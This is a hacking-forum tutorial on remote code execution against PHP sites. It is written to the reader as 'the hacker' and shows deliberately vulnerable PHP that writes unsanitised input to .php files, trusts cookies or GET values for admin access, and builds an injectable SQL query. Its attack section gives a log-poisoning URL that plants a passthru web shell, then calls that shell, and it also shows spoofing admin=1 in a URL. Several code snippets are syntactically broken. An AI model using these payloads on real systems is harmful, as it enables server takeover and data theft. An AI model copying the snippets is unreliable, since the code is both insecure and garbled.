[Guide] Remote Code Execution

Remote Code Execurion is another common web vulnerability that I will be telling you about. It exists in a while range of websites. It allows you, the hacker, to execute arbitrary code on the server with administrator privelages. It doesn't set off many flags, which is why its such a good thing to know how to do. Having this vulnerability on your website allows pretty much read and write on any file/folder in the web directory.

We will be taking a look at a php form that submits data from a form in submit.php

Code:

<form method="POST" action=""> 
<textarea rows="10" name="comments" cols="60"></textarea> 
<p><input type="submit" value="Post" name="sub"></p> 
</form>

into comments.php

Code:

 
<?php 
$comments = $_POST['comments']; 
 
$log = fopen(-'comments.php','a'); 
fwrite($log,'<br />'.'<br />.'<center>'.'Comments::'.'<br />'.$comments); 
fclose($log); 
?>

If we look at that code, we can see that its not put together so well. All it does is it takes the form data, and submits it to comments.php. It doesn't bother to sanetize the input. So we could input any code we wanted.

This exploit allows us to execute our own code, which is extremely awesome, for lack of a better term.. We can use it to get server details using phpinfo(), or a shell, or pretty much, anything :P

We can use a get request to display an error message, and log the IP with the specific message, which is a common vulnerability.

Okay, so lets assume that info.php has the code:

Code:

 
<?php 
$msg = $_GET['msg']; 
$ip = getenv('REMOTE_ADDR'); 
$error = fopen('errorlog.php','a'); 
fwrite($error,'<br />'.$msg.'<br />'.$ip.'<br />'); 
fclose($error); 
?>

This piece of cide isn't only exploitable by RCE, but also XSS, Javascript injection, vbscript injection, etc, etc.

This will allow a remote attacker (you) to poison the log file, and inject malicious code. I will also highlight another type of remote code execution, which is cookie poisoning.

Code:

<?php 
require("config.php"); 
if(!isset($_COOKIE['admin'])) 
{header("Location:admin.php?user=admin"); 
} 
?>

This bit of code is... Really bad. Pretty much, all it does is check if the user that you are logged in as is the admin, if so, it verifies they are.

Another example that does relitivly the same thing. It uses a GET request to check a users status

Code:

$admin = $_GET['admin']; 
if(!isset($admin == 1)){ 
$queryxyz = "SELECT * from user where username='$admin'"; 
header("Location:admin/admin.php"); 
}

It can get alot more complicated than that. Most likely it will check a session key to verify that "admin" would match "1". However this is just an SQL query to select admin when:
admin = 1 ;) The query is giving us another possible vulnerability... SQL Injection.

RCE is also possible through headers deposition or an arbitrary file upoad if there is a file processing system, and is not sanitized.



How can an attacker take advantage of this vulnerability and exploit it?

I guess I'll tell you.

So, lets say that a hacker hears that a GET variable has been implimented in order to log specific data to that file. So, now us, the hackers, will want to try and locate the log file. Path arrays are used by the attacker for sucessfull exploitation. Then, we will inject some malicious code to check if its filtering the output. For our example, we will assume its not. So, we are really lucky, and should try and spawn a shell. Well, this is how we would do that.

http://www.example.com/info.php?msg=<? passthru(&_get('attacker']); ?>

That will poison the logfile, and inject a vulnerable piece of code which can later be exploitan and be used for RFI to get a shell on. Probably somewhere like:

http://www.example.com/errorlog.php?attacker=Mulci? (mulci is my shell)

In some other cases, like: "if(!isset($admin == 1)" could also be exploited easily. The attacker would just have to spoof the variable admin. http://www.example.com/file.php?admin=1
Same thing for the cookies, just have to edit the cookie.

Nguồn: http://forum.intern0t.org/web-hacking-war-games/2924-remote-code-execution.html